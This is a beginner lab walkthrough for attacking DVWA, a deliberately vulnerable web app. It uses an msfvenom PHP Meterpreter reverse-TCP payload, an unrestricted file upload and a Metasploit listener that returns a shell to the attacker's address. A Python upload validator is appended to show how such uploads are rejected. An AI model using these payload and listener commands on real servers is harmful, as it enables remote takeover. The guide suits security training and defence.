Web Server Penetration with DVWA and Metasploit (Beginner Guide)

Open a terminal on your Kali Linux machine and run:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw


This prints the raw PHP code of the payload.


Now copy the generated code into a text file and save it on your desktop with a .php extension.


Now open the DVWA web app on your server and log in with the following credentials:
Username - admin
Password - password


Now go to the File Upload section in the left pane and upload the PHP file created above.


When the upload finishes, the page shows you the path of the uploaded file.


Now open the uploaded file in your browser.


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.140
set lport 4444
exploit

Now you have access to the victim's server.
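
The upload step above succeeds because the application accepts a .php file and serves it from a location where the server executes it. As an added example (not part of the original post or of DVWA), here is a server-side upload check that would reject that file; the function name `validate_upload`, the image-only allowlist and the size limit are assumptions.

```python
import os
import secrets

# Assumed policy: image uploads only, each with its expected magic bytes.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 100_000  # assumed size limit


def validate_upload(filename, data):
    """Return (ok, reason, stored_name) for an uploaded file (hypothetical helper)."""
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed", None
    if len(data) > MAX_BYTES:
        return False, "file too large", None
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    # Heuristic only: the real control is storing uploads where the
    # server never executes them (outside the web root, handlers disabled).
    if b"<?php" in data.lower():
        return False, "embedded PHP tag", None
    # Never reuse the client-supplied name; keep only the vetted extension.
    return True, "ok", secrets.token_hex(16) + ext


# Constructed sample inputs (placeholders, not real payloads or images).
PHP_FILE = b"<?php /* placeholder */ ?>"
PNG_FILE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
GIF_WITH_PHP = b"GIF89a" + PHP_FILE

SAMPLES = [
    ("payload.php", PHP_FILE),
    ("payload.php.jpg", PHP_FILE),
    ("photo.gif", GIF_WITH_PHP),
    ("photo.png", PNG_FILE),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(name, "->", validate_upload(name, data))
```

Only the last sample is accepted, and it is stored under a random name, so the path shown after upload no longer depends on the client-supplied filename.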
